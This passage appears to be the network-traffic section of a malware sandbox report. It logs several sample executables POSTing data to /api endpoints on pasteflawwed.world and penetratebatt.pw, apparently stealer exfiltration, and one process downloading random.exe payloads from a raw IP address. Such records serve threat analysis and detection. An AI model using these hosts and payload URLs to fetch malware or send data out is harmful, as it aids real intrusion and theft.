                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=A59lb%2FgrR1cBAfKLAmMfeN0zbKmRMIjN6QzfbUcjb3%2BCpbuWzMFXhVOjYjjUjXkq4wCPULMNwJLqmUJfxB2LpHGqz84lDRluu8sE6dkPmXYAAnrXrQKW0SMqVq%2B7WxJq67psgJ0%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 914f114e597471bd-LHR
                                                          • flag-us
                                                            POST
                                                            https://pasteflawwed.world/api
                                                            f3Ypd8O.exe
                                                            Remote address:
                                                            172.67.214.11:443
                                                            Request
                                                            POST /api HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cookie: __cf_mw_byp=2D6M3v9Mhjm0qXW0YbwKHQjOf1FvZpwqFa11_EbooEI-1740060495-0.0.1.1-/api
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                            Content-Length: 53
                                                            Host: pasteflawwed.world
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Date: Thu, 20 Feb 2025 14:08:15 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            Vary: Accept-Encoding
                                                            Set-Cookie: PHPSESSID=4des6dt8efmdr9mkif2512mjpk; expires=Fri, 21 Feb 2025 14:08:15 GMT; Max-Age=86400; path=/
                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                            Pragma: no-cache
                                                            cf-cache-status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0MRdxfA1IdbKwseQGN1yGS7e2QGPVW0rksjARgXPN6xookQP6lyXGQNXaAbn0JMB9iKbEALF0qqrsjv3iSkkRTeTfDIpqKs0783T5rlMe3lgRrnuj07fY9PtiRNRfH7n6u%2FHUp4%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 914f114e89cc71bd-LHR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=21603&min_rtt=20858&rtt_var=2389&sent=14&recv=12&lost=0&retrans=0&sent_bytes=8135&recv_bytes=1060&delivery_rate=431302&cwnd=257&unsent_bytes=0&cid=46b9707b10cdeab9&ts=808&x=0"
                                                          • flag-us
                                                            POST
                                                            https://pasteflawwed.world/api
                                                            f3Ypd8O.exe
                                                            Remote address:
                                                            172.67.214.11:443
                                                            Request
                                                            POST /api HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: multipart/form-data; boundary=OCRWCCDJ59U829
                                                            Cookie: __cf_mw_byp=2D6M3v9Mhjm0qXW0YbwKHQjOf1FvZpwqFa11_EbooEI-1740060495-0.0.1.1-/api
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                            Content-Length: 1615
                                                            Host: pasteflawwed.world
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Date: Thu, 20 Feb 2025 14:08:16 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            Vary: Accept-Encoding
                                                            Set-Cookie: PHPSESSID=q3jdicbhga6muf907hcvon68t6; expires=Fri, 21 Feb 2025 14:08:16 GMT; Max-Age=86400; path=/
                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                            Pragma: no-cache
                                                            cf-cache-status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6fA3GU4rXRLTkof5bvyIOVI5wA4NH0Dn2lomG5hdw1uhzHn%2BCnw7ad%2BDB7kQeEQ%2FbP88Ea%2B1Chj6gT5HmkHIghTi0%2BpCCFbMRG8cWlno6Tqpd2SGQ0O9buNnUDhCGhmT5l4FWOU%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 914f11536e8d71bd-LHR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=21646&min_rtt=20858&rtt_var=1878&sent=17&recv=16&lost=0&retrans=0&sent_bytes=9313&recv_bytes=3118&delivery_rate=431302&cwnd=257&unsent_bytes=0&cid=46b9707b10cdeab9&ts=1138&x=0"
                                                          • flag-us
                                                            POST
                                                            https://pasteflawwed.world/api
                                                            f3Ypd8O.exe
                                                            Remote address:
                                                            172.67.214.11:443
                                                            Request
                                                            POST /api HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: multipart/form-data; boundary=IDI9ZNHNT
                                                            Cookie: __cf_mw_byp=2D6M3v9Mhjm0qXW0YbwKHQjOf1FvZpwqFa11_EbooEI-1740060495-0.0.1.1-/api
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                            Content-Length: 1068
                                                            Host: pasteflawwed.world
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Date: Thu, 20 Feb 2025 14:08:16 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            Vary: Accept-Encoding
                                                            Set-Cookie: PHPSESSID=nmmji3m4p1gksbc9rhln657jn3; expires=Fri, 21 Feb 2025 14:08:16 GMT; Max-Age=86400; path=/
                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                            Pragma: no-cache
                                                            cf-cache-status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kN%2B853LLPs%2BUH0AEw8o7Kkk7CI48nUPDZ2O%2BS0N7UdZw%2Fpp%2FEOABytNtKhBjeL1LlKHOaFMWLNO4lQacsIg7R0qXklg44bTmbPhivti%2Ff0plFi2tFA%2BvoZjqT03QWkyFhRshVgA%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 914f1155ed3994a9-LHR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=21906&min_rtt=20719&rtt_var=6426&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2860&recv_bytes=1754&delivery_rate=159941&cwnd=253&unsent_bytes=0&cid=90cafb1682e0fa7d&ts=256&x=0"
                                                          • flag-us
                                                            POST
                                                            https://pasteflawwed.world/api
                                                            f3Ypd8O.exe
                                                            Remote address:
                                                            172.67.214.11:443
                                                            Request
                                                            POST /api HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cookie: __cf_mw_byp=2D6M3v9Mhjm0qXW0YbwKHQjOf1FvZpwqFa11_EbooEI-1740060495-0.0.1.1-/api
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                            Content-Length: 87
                                                            Host: pasteflawwed.world
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Date: Thu, 20 Feb 2025 14:08:16 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            Vary: Accept-Encoding
                                                            Set-Cookie: PHPSESSID=smubs1lrajl1saed5v05euh3v5; expires=Fri, 21 Feb 2025 14:08:16 GMT; Max-Age=86400; path=/
                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                            Pragma: no-cache
                                                            cf-cache-status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=smIOWGhuGA5ZZkGoC8dEZV9vQ5Ll038C%2FGspRdQdu3im2YQ9D1YGEe0X3lLSzS%2FH0KiBkLtUYMb2d0UK%2BAESBbU7KI0PQiS5N1h3DLLX0VtwG6y8XUBwaos%2FsQsQFMDmkd2ERAE%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 914f1157cb7b956b-LHR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=22404&min_rtt=21209&rtt_var=6577&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2861&recv_bytes=762&delivery_rate=159728&cwnd=253&unsent_bytes=0&cid=25ba4f34c8fc76c0&ts=219&x=0"
                                                          • flag-us
                                                            POST
                                                            https://penetratebatt.pw/api
                                                            MAl7pjE.exe
                                                            Remote address:
                                                            172.67.161.147:443
                                                            Request
                                                            POST /api HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                            Content-Length: 8
                                                            Host: penetratebatt.pw
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Date: Thu, 20 Feb 2025 14:08:17 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            Vary: Accept-Encoding
                                                            Set-Cookie: PHPSESSID=laq0hsrsk4426s1f8tl1thtb6n; expires=Fri, 21 Feb 2025 14:08:17 GMT; Max-Age=86400; path=/
                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                            Pragma: no-cache
                                                            cf-cache-status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xte%2BFi67Wayed%2F0BvYjbJir1%2Fesp0jYoVoezJ3lg5O9euVmdHml9Lhbx3%2BfbFy7ZZvbgQEnRhVzwQ6az7GyeD7e9upLl6vXlkG4nFp1L4CZcFglz6m8tusVzVJCX%2FhwgOU2J"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 914f115b9d46940b-LHR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=23279&min_rtt=20812&rtt_var=9049&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2857&recv_bytes=584&delivery_rate=162553&cwnd=253&unsent_bytes=0&cid=55330c0e2a43b349&ts=246&x=0"
                                                          • flag-us
                                                            POST
                                                            https://pasteflawwed.world/api
                                                            MAl7pjE.exe
                                                            Remote address:
                                                            172.67.214.11:443
                                                            Request
                                                            POST /api HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                            Content-Length: 8
                                                            Host: pasteflawwed.world
                                                            Response
                                                            HTTP/1.1 403 Forbidden
                                                            Date: Thu, 20 Feb 2025 14:08:17 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Frame-Options: SAMEORIGIN
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4JuJGkfl1JdH%2BePGur25gZ2wCepI5SeRImGuCroXdfgWIdLzLQwiqUtQtBZcB7zbNfu6MK21hXh5U9t%2F%2Fg7bQ6aFiOjb5BYVR0grtqN9PYOG8dmsPt8Y3IQ%2B0oeG9pXOMMDe19U%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 914f115d5ebf414c-LHR
                                                          • flag-us
                                                            POST
                                                            https://pasteflawwed.world/api
                                                            MAl7pjE.exe
                                                            Remote address:
                                                            172.67.214.11:443
                                                            Request
                                                            POST /api HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cookie: __cf_mw_byp=414oRX1hhRZX9yfJWgu5c12pl35ugPjicJJXD3wFi8g-1740060497-0.0.1.1-/api
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                            Content-Length: 46
                                                            Host: pasteflawwed.world
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Date: Thu, 20 Feb 2025 14:08:18 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            Vary: Accept-Encoding
                                                            Set-Cookie: PHPSESSID=jnj5dth74141cm947980bauo84; expires=Fri, 21 Feb 2025 14:08:18 GMT; Max-Age=86400; path=/
                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                            Pragma: no-cache
                                                            cf-cache-status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=21lXEqvQn8oCXe5obzd4FOLO2eKbN5Bm4%2BU37ODE6J%2F8x0v9TRf6xB5j9KxTgyUYPwz84OI4SJn952uMh0wVew4mFvPhN6k02ryvK1dLVCevReq05EP9Y0MREs9bfH593FKYwxE%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 914f115d8eed414c-LHR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=21892&min_rtt=20887&rtt_var=2209&sent=14&recv=12&lost=0&retrans=0&sent_bytes=8135&recv_bytes=1060&delivery_rate=426403&cwnd=256&unsent_bytes=0&cid=6550b1e74b0afa8f&ts=1445&x=0"
                                                          • flag-us
                                                            POST
                                                            https://pasteflawwed.world/api
                                                            MAl7pjE.exe
                                                            Remote address:
                                                            172.67.214.11:443
                                                            Request
                                                            POST /api HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: multipart/form-data; boundary=Y58AWXXS84X2PZ8
                                                            Cookie: __cf_mw_byp=414oRX1hhRZX9yfJWgu5c12pl35ugPjicJJXD3wFi8g-1740060497-0.0.1.1-/api
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                            Content-Length: 1611
                                                            Host: pasteflawwed.world
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Date: Thu, 20 Feb 2025 14:08:19 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            Vary: Accept-Encoding
                                                            Set-Cookie: PHPSESSID=urlu2vpqrhr3i8sns65s63est1; expires=Fri, 21 Feb 2025 14:08:19 GMT; Max-Age=86400; path=/
                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                            Pragma: no-cache
                                                            cf-cache-status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=m52BCNb6LRqvYR519u%2BPiMw%2BV%2F4l17I4IHBmFbhg1VEk51MndGGDIkZKmi9ik6eNvMjokP7HZyxyWOiGU%2FWigyfAfWbsaQTDvS65BN2g30HWAzWFCFL1PWgOJmn8nUlkkjI4lEY%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 914f1166997a414c-LHR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=21745&min_rtt=20663&rtt_var=1950&sent=17&recv=16&lost=0&retrans=0&sent_bytes=9313&recv_bytes=3102&delivery_rate=426403&cwnd=256&unsent_bytes=0&cid=6550b1e74b0afa8f&ts=1846&x=0"
                                                          • flag-us
                                                            POST
                                                            https://pasteflawwed.world/api
                                                            MAl7pjE.exe
                                                            Remote address:
                                                            172.67.214.11:443
                                                            Request
                                                            POST /api HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: multipart/form-data; boundary=8ZWQMDX3DTZD2U6ESFY
                                                            Cookie: __cf_mw_byp=414oRX1hhRZX9yfJWgu5c12pl35ugPjicJJXD3wFi8g-1740060497-0.0.1.1-/api
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                            Content-Length: 1116
                                                            Host: pasteflawwed.world
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Date: Thu, 20 Feb 2025 14:08:20 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            Vary: Accept-Encoding
                                                            Set-Cookie: PHPSESSID=648nvqvg1d355ur82gf6omved9; expires=Fri, 21 Feb 2025 14:08:20 GMT; Max-Age=86400; path=/
                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                            Pragma: no-cache
                                                            cf-cache-status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1qSm7BMZA55U5WY11TVMxMBHZ6u7uwURwZU8aJs9DkykI%2F4rrBVjxiNtzWP8BCzY6hxmI49lpMLlZXEd74eFcnTFFCxzu%2BV0Xl46mT2maBb9s%2FNHPEAaxmi%2BPNLZKqX5LMjXp%2Bw%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 914f11694d8733fe-LHR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=22928&min_rtt=21003&rtt_var=7300&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2860&recv_bytes=1818&delivery_rate=141138&cwnd=253&unsent_bytes=0&cid=2f642355d075fbb2&ts=1527&x=0"
                                                          • flag-us
                                                            POST
                                                            https://pasteflawwed.world/api
                                                            MAl7pjE.exe
                                                            Remote address:
                                                            172.67.214.11:443
                                                            Request
                                                            POST /api HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cookie: __cf_mw_byp=414oRX1hhRZX9yfJWgu5c12pl35ugPjicJJXD3wFi8g-1740060497-0.0.1.1-/api
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                            Content-Length: 80
                                                            Host: pasteflawwed.world
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Date: Thu, 20 Feb 2025 14:08:21 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            Vary: Accept-Encoding
                                                            Set-Cookie: PHPSESSID=4maaa41e5ehn09i7pp8258aobl; expires=Fri, 21 Feb 2025 14:08:21 GMT; Max-Age=86400; path=/
                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                            Pragma: no-cache
                                                            cf-cache-status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YFAAcPxgku%2Fz5UneKsbrjHDIhOqkQX5LFEvHleoiV%2F74MqXlyJf%2BG5BimsWNkLNFLF1UbvT5hz2xbGVoxbqtMAabhWgeg%2Bz9EHSxBPPYQLluQTDpKNzQN6UXLiGIIzUk8BnD3KM%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 914f11731b1e7786-LHR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=22138&min_rtt=21102&rtt_var=6232&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2862&recv_bytes=762&delivery_rate=159409&cwnd=246&unsent_bytes=0&cid=25be050b7228e91a&ts=336&x=0"
                                                          • flag-us
                                                            DNS
                                                            dozzenquear.fun
                                                            aca90f55db.exe
                                                            Remote address:
                                                            8.8.8.8:53
                                                            Request
                                                            dozzenquear.fun
                                                            IN A
                                                            Response
                                                          • flag-ru
                                                            GET
                                                            http://185.215.113.75/files/martin1/random.exe
                                                            futors.exe
                                                            Remote address:
                                                            185.215.113.75:80
                                                            Request
                                                            GET /files/martin1/random.exe HTTP/1.1
                                                            Host: 185.215.113.75
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Server: nginx/1.18.0 (Ubuntu)
                                                            Date: Thu, 20 Feb 2025 14:08:22 GMT
                                                            Content-Type: application/octet-stream
                                                            Content-Length: 6559232
                                                            Last-Modified: Thu, 20 Feb 2025 13:29:50 GMT
                                                            Connection: keep-alive
                                                            ETag: "67b72e4e-641600"
                                                            Accept-Ranges: bytes
                                                          • flag-ru
                                                            GET
                                                            http://185.215.113.75/files/unique2/random.exe
                                                            futors.exe
                                                            Remote address:
                                                            185.215.113.75:80
                                                            Request
                                                            GET /files/unique2/random.exe HTTP/1.1
                                                            Host: 185.215.113.75
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Server: nginx/1.18.0 (Ubuntu)
                                                            Date: Thu, 20 Feb 2025 14:08:32 GMT
                                                            Content-Type: application/octet-stream
                                                            Content-Length: 3961856
                                                            Last-Modified: Thu, 20 Feb 2025 12:35:00 GMT
                                                            Connection: keep-alive
                                                            ETag: "67b72174-3c7400"
                                                            Accept-Ranges: bytes
                                                          • flag-us
                                                            POST
                                                            https://pasteflawwed.world/api
                                                            aca90f55db.exe
                                                            Remote address:
                                                            172.67.214.11:443
                                                            Request
                                                            POST /api HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                            Content-Length: 8
                                                            Host: pasteflawwed.world
                                                            Response
                                                            HTTP/1.1 403 Forbidden
                                                            Date: Thu, 20 Feb 2025 14:08:23 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Frame-Options: SAMEORIGIN
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UQ0QoJm5MIZajADEZzNCuV1Qz3L5dHQedFg3Io%2Fq%2F%2BcAdeqV6VpeC%2F72D2%2BFjcsxIDKZctSL44iDSHAPJ7YogIxYIswp5ZJanjAXE7IA6mz1KX8BL2brnYwVF3mUbm7BvJjFP0o%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 914f1184e948653a-LHR
                                                          • flag-us
                                                            POST
                                                            https://pasteflawwed.world/api
                                                            aca90f55db.exe
                                                            Remote address:
                                                            172.67.214.11:443
                                                            Request
                                                            POST /api HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cookie: __cf_mw_byp=LBa0Y41qkWN0klNngw6XEevr4G4Foqpb1fxpZKTm26I-1740060503-0.0.1.1-/api
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                            Content-Length: 53
                                                            Host: pasteflawwed.world
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Date: Thu, 20 Feb 2025 14:08:24 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            Vary: Accept-Encoding
                                                            Set-Cookie: PHPSESSID=99k2rt8lrmtu06pcontto89aql; expires=Fri, 21 Feb 2025 14:08:23 GMT; Max-Age=86400; path=/
                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                            Pragma: no-cache
                                                            cf-cache-status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fvXv2kNaglnal5vReywPh0C2qa0VyMzRraoCetgzwWibHTi4BQ1RaN2qt21zfHZPtpHGSfqVm9hzpqIEcsmxdl9OeKIF8%2Fv7lkNtWQKi3CSRmgGfFPmYgwJfHysyf1tGX%2FescOU%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 914f11851981653a-LHR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=26393&min_rtt=21234&rtt_var=8260&sent=15&recv=13&lost=0&retrans=0&sent_bytes=8134&recv_bytes=1060&delivery_rate=499447&cwnd=257&unsent_bytes=0&cid=616ec866ad114483&ts=292&x=0"
                                                          • flag-us
                                                            POST
                                                            https://pasteflawwed.world/api
                                                            aca90f55db.exe
                                                            Remote address:
                                                            172.67.214.11:443
                                                            Request
                                                            POST /api HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: multipart/form-data; boundary=9DUO8E6EBOJT0UQHO
                                                            Cookie: __cf_mw_byp=LBa0Y41qkWN0klNngw6XEevr4G4Foqpb1fxpZKTm26I-1740060503-0.0.1.1-/api
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                            Content-Length: 1620
                                                            Host: pasteflawwed.world
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Date: Thu, 20 Feb 2025 14:08:24 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            Vary: Accept-Encoding
                                                            Set-Cookie: PHPSESSID=lj512kdoj3ocrcc1mdk3vmvmde; expires=Fri, 21 Feb 2025 14:08:24 GMT; Max-Age=86400; path=/
                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                            Pragma: no-cache
                                                            cf-cache-status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lDD%2B5ZAFk6YkfoWZ2WKHMWqEQ8CBoTymF57rZV9JD362Vh5VRQuyV0pJH6MYf3Ms0NbXvSrNMwOE9SsRrYsOVR3OCgtBZcrPXG%2FqxpEDaez7wL2P%2B8vmggzBzAee0mLLsfxnbVM%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 914f11868b18653a-LHR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=25727&min_rtt=20927&rtt_var=7527&sent=18&recv=17&lost=0&retrans=0&sent_bytes=9312&recv_bytes=3118&delivery_rate=499447&cwnd=257&unsent_bytes=0&cid=616ec866ad114483&ts=481&x=0"
                                                          • flag-us
                                                            POST
                                                            https://pasteflawwed.world/api
                                                            aca90f55db.exe
                                                            Remote address:
                                                            172.67.214.11:443
                                                            Request
                                                            POST /api HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: multipart/form-data; boundary=TDK3IGGC34WETG70C
                                                            Cookie: __cf_mw_byp=LBa0Y41qkWN0klNngw6XEevr4G4Foqpb1fxpZKTm26I-1740060503-0.0.1.1-/api
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                            Content-Length: 1119
                                                            Host: pasteflawwed.world
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Date: Thu, 20 Feb 2025 14:08:24 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            Vary: Accept-Encoding
                                                            Set-Cookie: PHPSESSID=pfagofeuoqbs01iuna421bu6q7; expires=Fri, 21 Feb 2025 14:08:24 GMT; Max-Age=86400; path=/
                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                            Pragma: no-cache
                                                            cf-cache-status: DYNAMIC
